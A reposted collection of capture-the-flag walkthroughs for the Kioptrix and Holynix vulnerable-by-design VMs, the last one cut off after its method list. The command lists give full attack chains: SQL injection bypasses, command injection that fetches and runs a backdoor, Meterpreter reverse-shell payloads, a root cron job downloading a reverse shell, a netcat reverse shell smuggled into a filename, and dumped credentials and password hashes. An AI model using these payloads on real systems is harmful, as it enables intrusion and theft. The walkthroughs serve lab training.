HOWTO : Kioptrix - Level 1.1

*** Do NOT attack any computer or network without authorization or you may put into jail. ***

Credit to : g0tmi1k

This is g0tmi1k's work but not mine. I re-post here for educational purpose only. It is because I enjoy his videos very much and I am afraid of losing them.

The original post at here

Links

Watch video on-line
Download video

Brief Overview

Time for level 2! Like before, kioptrix is another “Vulnerable-By-Design OS” (De-ICE, Metasploitable and pWnOS), with the aim to go from "boot" to "root" by any means possible.

This video demonstrates how code being injected into a web page results in the machine becoming compromised. The attacker afterwards then starts exploring the system for further pieces of information.

Method

Scan network for hosts (Nmap)
Bypass login screen (MySQL Injection)
Local command execution (PHP Injection)
Upload a backdoor (PHP Meterpreter)
Gain root access (ip_append_data() local ring0 root exploit)
Game Over
Enable access to MySQL database (MySQL Injection)
Gather information (history and user credentials)

What do I need?

Kioptrix - Level 2 VM. Download here (Mirror: Part 1 MD5:CF25057866E4BEA4F05651ACC222E3AE, Part 2 MD5:1ADCE0A6AFE4EE2FADD82F9EE3878AED, Part 3 MD5:A8012648FAB73746CE4E3250E0D66291)
VMware player OR workstation. Download here
Nmap – (Can be found on BackTrack 4-R2). Download here
Metasploit – (Can be found on BackTrack 4-R2)
Internet Browser – (Firefox can be found on BackTrack 4-R2)
A Text Editor – (Kate can be found on BackTrack 4-R2)
ip_append_data() ring0 Root Exploit – (Can be found on exploit-db.com)
MySQL – (Can be found on BackTrack 4-R2)

Walk through *Due to the forums security, I'm unable to post the complete walk through*

After starting the network services and obtaining an IP address (192.168.0.33), the attacker does a quick nmap scan to show what host are currently "alive" on the network. After a target IP is known the attacker proceeds to do a more detailed scan on the target (192.168.0.202). By doing this, nmap shows what possible services (ports) the target has running and the version of the service and then attempts to identify the operating system (OS). The result of this shows:

* OS: Linux v2.6.x (2.6.9-30)
* Port 80 - Web Server: Apache httpd 2.0.52 (CentOS)

The attacker navigates to the web server and is presented with a login page. The attacker chooses to enter a 'standard administrator's user name'("admin") as the user name and instead of entering a valid password uses some “MySQL injection code”. This "password" will cause the original MySQL statement returning true, therefore it will login as the chosen user without the correct password being present. The vulnerable code is as follows:

* Original command
$query = "SELECT * FROM users WHERE username = '$username' AND password='$password'";

* Expected input (user: admin, Password: 5afac8d85f):
$query = "SELECT * FROM users WHERE username = 'admin' AND password='5afac8d85f'";

* "Injected" input (user: admin, Password: ' OR 1=1 -- -):
$query = "SELECT * FROM users WHERE username = 'admin' AND password='' OR 1=1 -- -'";

This works because the attacker has asked to login as "admin" and because the MySQL command is looking either for: "password" OR "1=1" to match. Because 1 will ALWAYS be 1, the statement will return true, therefore allowing the attacker to login as admin. The code at the end " -- -", comments out the rest of the query which means that the rest of the query is ignored so the attacker does not have to worry about fixing the syntax.

The attacker is then looking at the admin panel, which allows the admin to "ping" other computers attached to the network from the server location. The attacker notices that the web pages has a "php" file extension and guesses that the server supports PHP and wonders if meterpreter agent would be able to execute. The attacker creates a "php meterpreter backdoor file" and sets up a metasploit to interact with the backdoor. The attacker starts a web server which is used to host the backdoor.

The attacker now needs to transfer the backdoor onto the server allowing them to be able to gain a remote access on the system. As mentioned before the admin panel allows admins to "ping". The attacker then tries to inject in the php file to run other commands instead. The vulnerable code is as follows:

* Original command
echo shll_exec( 'ping -c 3 ' . $target );

* Expected input (ip: 192.168.0.1):
echo shll_exec( 'ping -c 3 ' . 192.168.0.1 );

* "Injected" input (ip: ; ** /*** && **** -O bd.php 192.168.0.33/backdoor.php.txt && php -f bd.php):
echo shll_exec( 'ping -c 3 ' . ; ** /*** && **** -O bd.php 192.168.0.33/backdoor.php.txt && php -f bd.php );

The coded uses “shll_exec” allows to: "Execute command via shell and return the complete output as a string". The ping command is hard-coded in at the start, however because the ping command requires an IP address to be successfully executed it fails to receive therefore it also fails to execute. Instead the attacker has used ";" which allows for commands to be executed sequentially regardless of outcome (e.g. multiple commands on the same line), which means the PHP code continues to run the attackers command even though “ping” failed. The attacker has "asked" to:

* Change directory to "/***" as this is writeable for the exploited user "apache".

* Download the content of a web page (which is the backdoor), rename it to a shorter filename and change the file extension.

* Then execute the code.

The attacker checks that a session has been created in metasploit and interacts with it. The result being that the attacker now has a remote shell on the target system.

However the exploited service (PHP) is using a user that has limited access to the system and the attacker would like more (plus the objective of kioptrix is to gain access to the superuser, "root"). The attacker makes a note of the targets system's kernel version and searches for an exploit that could lead to "privilege escalation" which would allow for “deeper access” into the system. After searching for known exploits the attacker identifies an exploit that is compatible with the target's system. The attacker downloads a copy of the exploit and transfers it using the same method as the backdoor previously. After successfully compiling the exploit, the attacker runs the exploit on the target's success which results in the attacker being promoted to the "root" account. The attacker then creates a copy of the backdoor file in the "document root". The attacker then kills the remote shell. (Note: The end goal of kioptrix has been reached and everything after copying the backdoor is optional).

As the login page requires login details, which need to be stored somewhere the attacker decides to locate these pieces of information. The attacker starts by viewing the source code of the login page for clues as these details could be; hard-coded into the source, use another file to handle this function or use a database.

Once the attacker identities that the login page uses a MySQL database which contains the login details, the attacker wants to discover what else is stored in the database. As the login page relies on the database, the login page will contain a username and password in which to access it. The attacker uses a copy the login details plus as the attacker can executed commands, they use this to their advantage by command line interaction with MySQL database.

The attacker starts off viewing all the databases which are stored in MySQL, and spots the table "MySQL" which might contain some 'interesting' details! The attacker moves on to seeing what tables are in the database, which brings up a table called "users". After selecting everything in the table the attacker spots that the "root" user has the same hash (hence same password) as the user "john" (which they are currently using).

The attacker can keep using the current system to interact with the database; however allowing direct command line access from their machine would be 'easier'. So the attacker goes about reconfiguring MySQL to allow this. Currently the only allowed access is from the local machine itself(localhost/127.0.0.1), therefore no external communication is allowed (as seen by the "nmap" & "MySQL"). However as the attacker can execute commands locally it "grants all privileges" to the user "root" on the attackers IP (which still protects access from everyone else!).

After connecting via command line, the attacker sets about finding the real password for the admin panel instead of injecting to gain access. The attacker knows which database is used (via the source code of the login page), and browses the contents of the tables. The attacker finds 2 valid logins and tries them out. The first time, shows what happens if the login details are incorrect, the next login is from a "non admin" but a valid account, and the last login is the valid admin account. When the attacker was injecting it the admin account was not specified, the database would login as the first user, in which in most cases it is the admin account as it is usually the first user that is created.

The attacker can use MySQL to view files however just like before when using PHP injection because the exploited user is a limited account, it has limited access to the system however it is a different user from before, as it now is "mysql" rather than “apache”.

The attacker tests the backdoor in order to get a remote shell again. However it is easier this time as they do not have to go though the hassle of injecting again. The attacker can just execute the php backdoor, this time done by visiting it directly on the web server, which results in the php code being executed.

After gaining access and exploiting the system gain root access, the attacker scans the system for ".mysql_history", which is a file that contains previous entered commands and views the contents when using the "root" account.

Commands *Due to the forums security, I'm unable to post the complete command list.*

start-network
dhclient eth0
clear

nmap 192.168.0.0/24 -n -sn -sP
nmap 192.168.0.202 -p 1-65500 -O -sS -sV -v

firefox http://192.168.0.202
-> User: admin
-> Password: ' OR 1=1 -- -

clear
msfpayload | grep PHP
msfpayload php/meterpreter/reverse_tcp LHOST=192.168.0.33 LPORT=8080 R > /var/www/backdoor.php.txt
start-apache
msfconsole
use multi/handler
search php
set PAYLOAD php/meterpreter/reverse_tcp
show options
set LHOST 0.0.0.0
set LPORT 8080
show options
exploit -j -z
* kate -> /var/www/backdoor.php.txt. Remove "#". Save.
; ** /*** && **** -O bd.php 192.168.0.33/backdoor.php.txt && php -f bd.php
sessions -l -v
sessions -i 1
sysinfo
shell
uname -a; cat /etc/*-release; id; w

Firefox: Search (exploit.db): Linux Kernel 2.6 -> Download #http://www.exploit-db.com/exploits/9542/
cp 9542.c /var/www/escpriv.c
* cd /tmp
* wget 192.168.0.33/escpriv.c
* gcc escpriv.c -o rootMe
* id
* ./rootMe
* id
* whoami && cat /etc/issue

* cp bd.php /var/www/html/backdoor.php # root only on folder!
^C
y #n = interact 0 && background

firefox http://192.168.0.202
; cat index.php
-> Right click -> View Source.
--> User: john
--> Passowrd: hiroshima
--> Database: webapp
; mysql -u john -phiroshima -e "SHOW databases;"
; mysql -u john -phiroshima -e "USE mysql; SHOW tables;"
; mysql -u john -phiroshima -e "USE mysql; SELECT * FROM user;"
mysql -h 192.168.0.202 -u root
nmap 192.168.0.202 -sV -p 3306
; mysql -u root -phiroshima -e "USE mysql; GRANT ALL PRIVILEGES ON *.* TO 'root'@'192.168.0.33';" #-D mysql #IDENTIFIED BY 'g0tmi1k';"
nmap 192.168.0.202 -sV -p 3306
mysql -h 192.168.0.202 -u root
SHOW databases;
USE webapp; SHOW tables;
SELECT * FROM users;
#* firefox http://192.168.0.202/
#-->Login *fail*, john, admin
SELECT load_file('/etc/passwd');
exit

firefox http://192.168.0.202/backdoor.php
sessions -i 2
shell
*UNABLE TO POST THIS LINE OF CODE. SEE BLOG POST*
* ** /***; ./rootMe
* cat /root/.mysql_history
* cat /etc/shadow

* whoami && cat /etc/issue


#---------------------------------------------------------------------
MySQL->history: root:Ha56!blaKAbl [???]
MySQL->users: root:hiroshima [hash: 5a6914ba69e02807]
MySQL->users: john:hiroshima [hash: 5a6914ba69e02807]
MySQL->WebApp: admin:5afac8d85f [Type: Admin]
MySQL->WebApp; john:66lajGGbla [Type: Non-admin]
Shadow: root:$1$FTpMLT88$VdzDQTTcksukSKMLRSVlc.:14529:0:99999:7:::
Shadow: john:$1$wk7kHI5I$2kNTw6ncQQCecJ.5b8xTL1:14525:0:99999:7:::
Shadow: harold:$1$7d.sVxgm$3MYWsHDv0F/LP.mjL9lp/1:14529:0:99999:7:::
#---------------------------------------------------------------------


Notes

- When meterpreter is being hosted on the attacker's system, the file extension is “.txt”, therefore it does not get executed like a php file would when called from wget on the targets system.
- The “document root” folder is only writeable by “root”.
* The attacker did not have to kill the remote shell and could have been executed in it, however this method demonstrates if the backdoor failed to work or if the attacker did not wish to use one for whatever
reason)
- When connecting to MySQL remotely, a password is not required because when executing the "GRANT ALL PRIVILEGES" statement it did not include "IDENTIFIED BY 'g0tmi1k'" after the IP address. This would set the password to "g0tmi1k".

That's all! See you!

HOWTO : Kioptrix - Level 1.2

*** Do NOT attack any computer or network without authorization or you may put into jail. ***

Credit to : g0tmi1k

This is g0tmi1k's work but not mine. I re-post here for educational purpose only. It is because I enjoy his videos very much and I am afraid of losing them.

The original post at here

Links

Watch video on-line
Download video

Brief Overview

It's time for round 3 with Kioptrix's "Vulnerable-By-Design" series. Normal goal of "boot-to-root", by any means possible.

The target was fully compromised with a mixture of; SQL injection, re-used credentials and poorly configured setting. After gaining root access, to extent the video two methods of backdooring the system were installed as well as an alternative idea to escape privileges.

Method

Scanned network for the host (nmap)
Added IP address to the host file
Port scanned the host (unicornscan)
Banner grabbed the services running on the open ports (nmap)
Discovered usernames via a 'Local File Inclusion' vulnerability (Firefox)
Enumerated database (manual MySQL injection)
Reused credentials granting a remote shell
Poorly configured setting to escape privileges (Unprotected limited root access)
Uploaded and used a web backdoor (Meterpreter)
Automated MySQL Injection (SQLMap)
Alternative method to gain root as well as escaping privileges (Cron Job)

What do I need?

Kioptrix VM Level 1.2 [KVM3.rar] (MD5: D324FFADD8E3EFC1F96447EEC51901F2)
A virtual machine (Example: Virtual Box or VMware Player)
Nmap – (Can be found on BackTrack 5).
Unicornscan – (Can be found in BackTrack 5's repository).
Exploit-DB – (Can be found on BackTrack 5).
John The Ripper – (Can be found on BackTrack 5).
SQLMap – (Can be found on BackTrack 5).
Metasploit – (Can be found on BackTrack 5).

Walkthrough

The attacker starts off with locating the target system on the network, which is done by using a quick "ping" scan via nmap.

Once the target has been discovered the attacker, adds the IP address to their host file. (The reasoning for this is due to Kioptrix using DHCP to assign its IP address and later on, the HTML code needs a "static reference" to use as a source).

Afterwards the attacker executes a TCP & UDP port scan by using unicornscan. The results show only two ports are open, TCP 22 and TCP 80. The attacker repeats the port scan however switches to nmap and enables the option to "banner grab" the services which are running on open ports, to enumerate running services. Nmap confirms that the same ports are open as well as the default services are also using them, SSH (TCP 22), and Web (TCP 80).

The attacker continues by interacting with the web server. Upon visiting the web server, the attacker is presented with a blog. When exploring the web site, the attacker notices a common URI, which often has a "Local/Remote File Include" vulnerability. The attacker uses this to their advantage by including a known file which commonly contains details of each user on the system. This shows that system has two possible users "loneferret" and "dreg".

One of the blog posts, referred to a product which is running on their web server, a new gallery. At the end of the post, contain the URL to the gallery. Another post, helped confirmed one of the usernames, "loneferret", as it was mentioned again.

After looking at the source code for the gallery, the attacker notices that the admin link in the template has been commented out, rather than being removed from the code completely. After visiting the page, the gallery service has been identified as "gallarific".

When checking to see if "Gallarific" has any known public exploits, they find it is subject to a SQL injection attack. The exploit gives the weak URL and the attacker manually starts enumerating the database. They start off by seeing which tables are accessible, then the names of the columns inside the "dev_account" table. This shows there are three fields, "id", "username" and "password". The attacker views the values and upon doing so, sees the same two usernames as before along with their respected MD5 hashes.

The attacker inserts the hashes into John the ripper, which quickly brute forces them (as they are not salted!), showing that loneferret's password is "starwars" and dreg's is "Mast3r".

A common issue is password re-use, which the attacker is aware of, therefore they attempt to see if any of the users did so with their SQL and SSH credentials. Loneferret did.

After viewing loneferrts personal folder, there is a company readme file which explains their policy, that they must use a certain program, "ht" to create, view and edit files. However, in the example command, it says the employee needs to use "sudo" in which to do so. Sudo allows programs to be used with the security privileges of another user, which in this case is the super root account - root. This allows the attacker to create, view and edit any file.

With this, the attacker uses ht to "upgrade" their currently limited usage of the sudo to give them root access. After granting the upgrade of privileges, the attacker logs in as root. The attacker now has access to the complete system...

Game over

Because the attacker doesn't wish to keep exploiting the same box again, they want to place a backdoor, which allows for quicker access back into the system. The attacker searches for the admin credentials to the gallery product, as there is a high chance that there is an upload feature which they could try and take advantage of.

By using the same SQL injection as before, the attacker manually starts searching another table, "gallarific_users". The attacker soon finds the admin username & password, in plain text.

(Editor's note: This stage isn't "needed", it was only done to show how automated tools simplify the whole process!)

The attacker then starts to enumerate the whole database, by using SQLMap. The tool quickly finds extra useful information regarding the database, as well as automatically attempting to crack any known password hash formats. This confirms everything which was found manually.

After logging in as the admin for the gallery, the attacker is able to confirm their suspicions from earlier, the product supported uploading. The attacker generates a PHP reserve shell with an image format and then uploads their evil image. Due to the product automatically checking file extensions, renaming uploaded images and the server configuration the attacker isn't able to execute the "image". However, due to the "local file include", which was found at the beginning, the attacker is able to execute the code inside the image, which creates a shell. The type of shell which the attacker is using to interact with the system isn't able switch users. But by using python which has already been installed locally on the system, the attacker is able to code a quick script to get around this limitation by using python to spawn a bash terminal in the background and relay commands into it.

Instead of modifying the sudoers file originally to gain root access to the system, the attacker writes a cron job to: start on the next minute, then as the root account, to download a file and execute it, as well as deleting the job (optional!). The attacker then creates the back door executable file as well as starting a web server to host the file for the target to download. The attacker then waits for the targets clock to reach the next minute and execute the command, spawning a remote root shell.

Game over...again

Commands

nmap 192.168.0.* -n -sn -sP
echo 192.168.0.10 kioptrix3.com >> /etc/hosts # It's in the readme
cat /etc/hosts
us -H -msf -Iv kioptrix3.com -p 1-65535 && us -H -mU -Iv kioptrix3.com -p 1-65535
nmap -p 1-65535 -T4 -A -v kioptrix3.com
firefox kioptrix3.com # Link-> Blog
http://kioptrix3.com/../etc/passwd.html
# Gallery --> Source code (gadmin): http://kioptrix3.com/gallery/gadmin/
cd /pentest/exploits/exploitdb
grep -i gallarific files.csv
cat platforms/php/webapps/15891.txt
firefox kioptrix3.com/gallery/gallery.php
http://kioptrix3.com/gallery/gallery.php?id=null and 1=2 union select 1,2,3,4,5,6
http://kioptrix3.com/gallery/gallery.php?id=null and 1=2 union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=database()),4,5,6
http://kioptrix3.com/gallery/gallery.php?id=null and 1=2 union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name='dev_accounts'),4,5,6
http://kioptrix3.com/gallery/gallery.php?id=null and 1=2 union select 1,2,(select group_concat(id, 0x3A, username, 0x3A, password) from dev_accounts),4,5,6
echo -e "0d3eccfb887aabd50f243b3f155c0f85\n5badcaf789d3d1d0 9794d8f021f40f0e" >> /tmp/hashes
cd /pentest/passwords/john
./john /tmp/hash --format=raw-md5
ssh loneferret@kioptrix3.com # starwars
id
pwd
ls -lA
cat CompanyPolicy.README
ls -lh /etc/sudoers
cat /etc/sudoers
sudo ht # starwars File -> Open: /etc/sudoers -> Edit loneferret: loneferret ALL=(ALL) ALL -> File -> Save
sudo su # starwars
id && ifconfig && uname -a && cat /etc/shadow && ls -lAh ~/
cd /etc/apache2/sites-enabled
ls
cat * | grep -i documentroot
exit
exit
firefox
http://kioptrix3.com/gallery/gallery.php?id=null and 1=2 union select 1,2,3,4,5,6
http://kioptrix3.com/gallery/gallery.php?id=null and 1=2 union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name='gallarific_users'),4,5,6
http://kioptrix3.com/gallery/gallery.php?id=null and 1=2 union select 1,2,(select group_concat(userid, 0x3A, username, 0x3A, password, 0x3A, usertype) from gallarific_users),4,5,6
cd /pentest/database/sqlmap
./sqlmap.py -u "http://kioptrix3.com/gallery/gallery.php?id=1" -f -b --current-user --is-dba --dbs
./sqlmap.py -u "http://kioptrix3.com/gallery/gallery.php?id=1" --columns
./sqlmap.py -u "http://kioptrix3.com/gallery/gallery.php?id=1" --users --passwords
./sqlmap.py -u "http://kioptrix3.com/gallery/gallery.php?id=1" --file-read="/etc/passwd"
./sqlmap.py -u "http://kioptrix3.com/gallery/gallery.php?id=1" --dump
http://kioptrix3.com/gallery/gadmin # admin n0t7t1k4 Upload new pic
cd /pentest/backdoors/web/webshells
ls -lAh
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.0.192 LPORT=443 -f raw > /tmp/evil.jpg # msfpayload php/meterpreter/reverse_tcp LHOST=192.168.0.192 LPORT=443 R
msfcli multi/handler PAYLOAD=php/meterpreter/reverse_tcp LHOST=192.168.0.192 LPORT=443 E
firefox http://kioptrix3.com/gallery/photos/home/www/kioptrix3.com/gallery/photos/w835623l98.jpg.html
sysinfo
shell
su loneferret
echo "import pty; pty.spawn('/bin/bash')" > /tmp/shell.py
python /tmp/shell.py
su loneferret # starwars
sudo su # starwars
cd ~
ls
cat Congrats.txt
exit
exit
exit
exit
exit
ssh loneferrt@kioptrix3.com # starwars
cat CompanyPolicy.README
sudo ht
* * * * * root cd /tmp; wget 192.168.0.192/back.door && chmod +x back.door && ./back.door; rm /etc/cron.d/exploit # /etc/cron.d/exploit
msfpayload linux/x86/shell_reverse_tcp LHOST=192.168.0.192 LPORT=443 X > /var/www/back.door
file /var/www/back.door
/etc/init.d/apache2 start
msfcli multi/handler PAYLOAD=linux/x86/shell_reverse_tcp LHOST=192.168.0.192 LPORT=443 E
id
uname -a

Notes

- Editing the host file is mentioned in the README which is included (as well as on the blog post).

That's all! See you.

HOWTO : Holynix - Level 1

*** Do NOT attack any computer or network without authorization or you may put into jail. ***

Credit to : g0tmi1k

This is g0tmi1k's work but not mine. I re-post here for educational purpose only. It is because I enjoy his videos very much and I am afraid of losing them.

The original post at here

Links

Watch video on-line
Download video

Brief Overview

The Holynix series is another collection of operating systems with purposely crafted weakness(es) in them. The usual aim of a "boot-to-root"; try and get a shell with the highest user privilege you can.

Method

Scanned the network for the target (nmap)
Port scanned the host (unicornscan)
Banner grabbed the services running on the open ports (nmap)
Bypass the login screen (SQL Injection & Cookie modification)
Collected possible usernames from harvested email addresses (Bash fu)
Discovered system usernames (Tamper Data)
Located user online directories (DirBuster)
Uploaded backdoor with spoofed credentials (Tamper Data)
Located database credentials & viewed content
Escalated privileges (Plain text credentials)
Cloned the user's port knocking profile (KnockKnock)
Discovered a vulnerable running service to gain future privileges (ChangeTrack)
Waited for the exploit to be triggered (Scheduled for ever 5 minutes)

What do I need?

holynix-v1.tar.bz2 [MD5: D19306C6C2305005C72A7811D2B72B51] – (Homepage).
A virtual machine (Example: Virtual Box or VMware Player)
Nmap – (Can be found in BackTrack 5).
Unicornscan – (Can be found in BackTrack 5's repository).
Tamper Data – (Can be found in BackTrack 5).
DirBuster – (Can be found in BackTrack 5).
Metasploit – (Can be found in BackTrack 5).
knockknock – (Can be found in Holynix VM!)
Exploit-DB – (Can be found in BackTrack 5).
Netcat – (Can be found in BackTrack 5).

Walkthrough

To start the attack, the target needed to be identified on the network. To achieve this, the attacker used nmap's quick "ping" scan, which reveals the targets IP address and MAC address (and vendor - if known).

By using unicornscan, the attacker was able to quickly scan every TCP & UDP port, in which to see if there are any services listening. The scan showed that only TCP port 80 was open, which happens to be the default web server port. The attacker then checked the results by "banner grabbing" with nmap, which confirmed that TCP port 80 had a web server running on it and at the same time detected the type of operating system being used.

The attacker then choose to interact with the web server by viewing its contents which they were presented with a login page. As the attacker hadn't collected any possible credentials, they tried to bypass it, rather than using brute force. By trial and error the attacker soon discovered that the password field is vulnerable to a basic SQL injection. This allowed the attacker to login as the first user in the database, "alamo".

After viewing the contents of the company's internal web pages, one of the pages displayed each employee's details (name, department, telephone number and email address). To build up an inside knowledge of the company, the attacker collected these details and extracted possible usernames from the email addresses. During this process the attacker discovers that the only form of authentication is the "uid" value in the session cookie and decides to match up the collected usernames to uid values. The attacker is now able to spoof their identity - as 11 different users.

Upon exploring the web site, the attacker discovered a page which displays documents from a pre-populated list. The attacker then modified their requested file, which causes a "Local File Include" (LFI) vulnerability, which is then used to view the current page's source code. The modified request was successful and the content was display inside the current page. By looking though the source code, the attacker was able to see that the page accepted either POST or GET requests - which simplify the process. The attacker continued by requesting a known file which commonly contains details of each user on the system (/etc/passwd); this returned with the same 11 users.

The attacker tests the web server to see if "mod_userdir" is enabled, which allows users folders to be accessible via the web server. The attacker takes the list of usernames which has been collected and added a "~" (Tilde) infront of the usernames, as this is used for the "home directory", for the requested username which is followed after it. The attacker then starts DirBuster, which will request all the values on any web server and return with the HTTP code (e.g. 200=successful, 403=forbidden, etc). DirBuster was able to confirm the 11 users on the system do have their personal directories which are publicly accessible.

Another internal feature on the web server was to allow users to uploads files to their personal folders. The attacker then crafts a reverse backdoor and upload it. However, they discovered that the current user which they are logged in as, alamo, has been disabled and wasn't able to upload files. The attacker tries again, but this time spoofs the requested user ID value to another known user, which was successful. When the attacker navigates to the user folder and opens the uploaded file, to execute the PHP code inside it. They discover the permissions of the file has been altered.

The attacker goes back to the LFI, and views the source code of the upload page. After analysing the code, they discover another page handles the request. Upon viewing the contents, the attacker notices that by using compressed files, it doesn't affect the file permissions. The attacker then re-packages the backdoor file into a compressed container and uploads with the same spoofed credentials. Before executing the backdoor, the attacker sets up a listener to catch the reverse connection. Once everything is ready, the uploaded code is requested, causing Apache to execute the PHP code, creating the server to connect back to the attacker, which achieves a remote shell for the attacker to interact with the remote system.

As the web server is using an internal (MySQL) database, the attacker is aware that the credentials need to be stored in a file to allow the web server to interact with the database. As the apache user executed the backdoor, the attacker has the same privileges as the web server, which allows the attacker to read the settings file. The attacker checks a few common default locations and soon locates the settings file, with the database credentials - in plain text.

The current shell is interactive, however it is unable to run certain commands (e.g. su, login or mysql ), as they required TTY (teletypewriter). However by using python the attacker is able to bypass the limitation and locally connect to mysql with the newly acquired details.

Upon exploring the databases, the attacker sees a few "interesting" named tables, one of which is called "accounts". The attacker displays every entry into this table and discovers the 11 user accounts' details in plain text.

The attacker goes back to the web server to view the internal message board, which employees used to communicate between. One of the messages explains that there has been issues with brute force attempts on the SSH service, so a "port knocking" solution has been used. Another message explains how to setup the new feature; creating the necessary folder and extracting the user's profile into them. The attacker uses the download link and installs the program, knockknock, for themselves.

Switching back to the remote system, the attacker changes users to the first user they used at the beginning, alamo. All the passwords recorded in the database is a mixture of upper and lower case, numbers and symbols with a length greater than 12, this creates a very strong password however as the password is stored in plain text it is very weak, allowing for the user to copy and paste the credentials, becoming that user. This allows the attacker to copy alamo's knockknock profile into the user's local home folder. The attacker then simply downloads the whole content of alamo's profile via the web server and places it into the necessary folder.

The attacker starts the port knocking sequence, each time testing to see if the port has become open for a brief period of time (only a couple of seconds). After the 3rd knock, the attacker is able to connect to the SSH server, which was previously closed.

Back on the internal message board, the attacker discovers there is "changetrack" installed, configured to back up a certain folder and is scheduled to run every five minutes. This services is usually executed with the highest level of privileges, otherwise it wouldn't be able to back up everything possible. The attacker checks that the user he is using, alamo, has access to the folder which is being monitored; turns out only two users are (one of which is alamo!).

The attacker then checks a local copy of a public exploit database, exploitdb, to see if there are any known exploits for this service. There was only one result, which reveals that the service doesn't escape certain filenames, therefore filenames which have been crafted can cause the service to execute shell commands. The attacker notes the example filename, which is given, however instead of doing a "bind" connection, they choose to reserve it instead. Locally, the attacker sets up another listener, and remotely checks for, and, configures a program, netcat, which allows for the network connections to read and execute commands. The reason why the attacker flips the direction of netcat was to allow the target to establish, letting the attacker just wait, rather than for them to keep checking.

The attacker now waits for the changetrack service to be triggered, which shouldn't be long, as it was hinted in the message board; it backs up every five minutes...

...A little while later, the attacker notices that the remote system has executed their command and created a remote shell with the super user, root, account privileges.

Commands

nmap 192.168.0.0/24 -sn -n
us -H -msf -Iv 192.168.0.11 -p 1-65535 && us -H -mU -Iv 192.168.0.11 -p 1-65535
nmap -p 1-65535 -T4 -A -v 192.168.0.11
firefox 192.168.0.11 & # Username: g0tmi1k Password: ' OR 1=1 # id: alamo
Right click -> View Page Info -> Headers
Firefox -> Directory

curl -s 192.168.0.11
curl -s --cookie "uid=1" 192.168.0.11
curl -s --cookie "uid=1" http://192.168.0.11/?page=employeedir.php | sed -e "s/
/
\n/g; s/example.net/example.net\n/g" | grep example.net | sed "s/@example.net//"
curl -s --cookie "uid=1" http://192.168.0.11/?page=employeedir.php | sed -e "s/
/
\n/g; s/example.net/example.net\n/g" | grep example.net | sed "s/@example.net//" > /tmp/users
wc -l /tmp/users
for x in $(seq 1 64); do
y=$(curl -s --cookie "uid=$x" 192.168.0.11 | grep Welcome, | sed "s/[ \t]*//; s/Welcome, //" | cut -d "." -f1)
if [ $y ] ; then echo $x=$y ; fi
done

Firefox -> Tools -> Tamper Data -> Start Tamper
firefox http://192.168.0.11/?page=ssp.php # Display File
Tamper -> text_file_name: ssp.php
http://192.168.0.11//index.php?page=ssp.php&text_file_name=/etc/passwd

cat /tmp/users| sed 's/^/~/' >> /tmp/users
cd /pentest/web/dirbuster
java -jar DirBuster-0.12.jar -u http://192.168.0.11 # /tmp/users.txt

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.0.192 LPORT=443 -f raw > /tmp/evil.jpg

Firefox -> Tools -> Tamper Data -> Start Tamper
firefox # Upload (fails)
Tamper -> Cookie: uid=2 # id: etenenbaum
firefox # Upload again

firefox http://192.168.0.11/~etenenbaum/ # evil.jpg
firefox http://192.168.0.11/?page=ssp.php # Display File
Tamper -> text_file_name: /home/etenenbaum/evil.jpg

http://192.168.0.11//index.php?page=ssp.php&text_file_name=upload.php
http://192.168.0.11//index.php?page=ssp.php&text_file_name=transfer.php

cd /tmp
mv evil.jpg evil.php
chmod +x evil.php
ls -l evil.php
tar -cvzf evil.tar.gz evil.php
ls -l evil*
msfcli multi/handler PAYLOAD=php/meterpreter/reverse_tcp LHOST=192.168.0.192 LPORT=443 E

firefox http://192.168.0.11/~etenenbaum/

sysinfo
shell
id
pwd
ls -lah
cd /var/apache2
ls -lah
cat config.inc
python -c 'import pty; pty.spawn("/bin/sh")'
mysql -u root -pmY5qLr007p@S5w0rD
SHOW DATABASES;
USE creds;
SHOW TABLES;
SELECT * FROM accounts;
quit

firefox http://192.168.0.11/index?page=messageboard.php # knockknock
wget http://192.168.0.11/misc/knockknock-0.7.tar.gz
tar zxvf knockknock-0.7.tar.gz
cd knockknock-0.7
head -n 20 INSTALL
python setup.py install

cd /etc/knockknock.d/profiles/
ls -lAh
cp -r alamo ~/knockknock
exit
exit
exit
exit
wget -r -np --reject=index* 192.168.0.11/~alamo/knockknock/
mv 192.168.0.11/~alamo/knockknock ~/.knockknock/192.168.0.11
ls -lAh
#cat config
nmap -p 22 -T5 -v 192.168.0.11
#python /tmp/knockknock-0.7/knockknock.py -p 13820 192.168.0.11
python /tmp/knockknock-0.7/knockknock.py -p 22 192.168.0.11 && nmap -p 13820 -T5 -v 192.168.0.11
python /tmp/knockknock-0.7/knockknock.py -p 22 192.168.0.11 && ssh alamo@192.168.0.11 # Ih@cK3dM1cR05oF7
id
# sudo -l

firefox http://192.168.0.11/index?page=messageboard.php # Changetrack

cd /pentest/exploits/exploitdb
grep -i changetrack files.csv
cat platforms/linux/local/9709.txt

ls -lah /home # development is set to nobody & developers
cat /etc/group | grep developers # Alamo jljohansen
cd /home/development
ls -lAh
whereis nc

nc -lvp 443

touch "<\`nc 192.168.0.192 443 -e \$SHELL\`" ls watch -d -n 1 "netstat -ant" # wait 5 mins id && /sbin/ifconfig && uname -a && cat /etc/shadow && ls -lAh /root/

Notes

- When starting the VM for the first time with VMware, select "Moved It" - otherwise it could cause issues (e.g. The target will not be visible!).
- There is the possibly of another method of gaining access, as well as different tools (e.g. burpsuite instead of using tamper data) or techniques (modify the SQL injection or permanently edit the cookie value) could be used to achieve the same effect.
- Some mistakes in the video are more obvious
- On reflection, a few commands should have been issues to verify the comments on the message box, such as: "ls /etc | grep -i changetrack", and "cat /etc/changetrack.conf".

That's all! See you.

HOWTO : Holynix - Level 2

*** Do NOT attack any computer or network without authorization or you may put into jail. ***

Credit to : g0tmi1k

This is g0tmi1k's work but not mine. I re-post here for educational purpose only. It is because I enjoy his videos very much and I am afraid of losing them.

The original post at here

Video Links

Watch video on-line
Download video

Brief Overview

Holynix is a series of operating systems with purposely designed weakness(es) left inside. The aim of them is to go from "boot-to-root"; the user has to try and get a shell with the highest user privilege they can reach.

Method

Scanned network for the target (Netdiscover)
Configured IP address (192.168.1.0/24)
Port scanned the target (unicornscan)
Banner grabbed the services running on the open ports (nmap)
Added the target's IP to the host file & Re-configured DNS settings
Successfully replicated the DNS databases (Zone Transfer)
Successfully brute forced web server directories (DirBuster)
Detected & exploited outdated software (phpMyAdmin)
Discovered an internal document (DirBuster)
